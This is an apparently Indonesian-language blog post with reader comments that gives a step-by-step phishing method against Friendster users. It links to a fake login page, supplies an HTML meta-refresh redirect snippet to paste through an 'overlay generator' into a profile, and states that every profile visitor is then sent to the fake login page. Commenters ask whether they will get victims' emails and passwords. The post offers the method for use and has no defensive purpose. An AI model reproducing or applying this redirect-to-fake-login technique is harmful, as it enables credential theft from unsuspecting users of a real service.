HAck Friendster III

Sekrang saya kasih tau cara terbaru dengan mengguanakan OG overlay>>lets start>>

pertama anda perlu halaman log in palsu untuk itu baca di sini>>

http://h1.ripway.com/xcode/blacklizard/fake.txt

===============================================
next part::redirecter>>

———————————————————————–

CODE
<html> <head> <title>Friendster-Log In</title>
<META http-equiv=”refresh” content=”0;URL=URL Fake login anda”> </head>
————————————————————————

Copy code diatas dan paste di overlay genarator

http://www.markyctrigger.com/OGvX.html?Kee…0&width=600

seterusnya click generate>>

copy semua code yang telah digenerate ke add media box dan save>> siap>>

kini sesiapa yang view profile anda akan terdirect ke fake login page yang telah anda buat>>

This entry was posted in Uncategorized. Bookmark the permalink.

12 thoughts on “HAck Friendster III

  1. wah..bisa kok bro, km jangan copi script webnya, tapi klik aja link yang aku kasih…pak mozilla ya ingat….

  2. masih tetep gak bisa bozz..!!
    file not found–

    terus kita bisa dpt email dan pass victim ya??
    maap nih masih newbie.bantuin ya..!!

  3. duh fake itu apa yach?????? kasih tau dung om

  4. kalau lewat comen ada gak ya???

    kalo ada kirim ke aku y!!!

  5. ada tapi lg ketlingsut ni gua cari dulu

  6. broo gak ketemu
    http ://h1.ripway.com/xcode/blacklizard/fake.txt
    wekwekwek !!

  7. Sekarang masih bisa di pake gak skriptnya?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s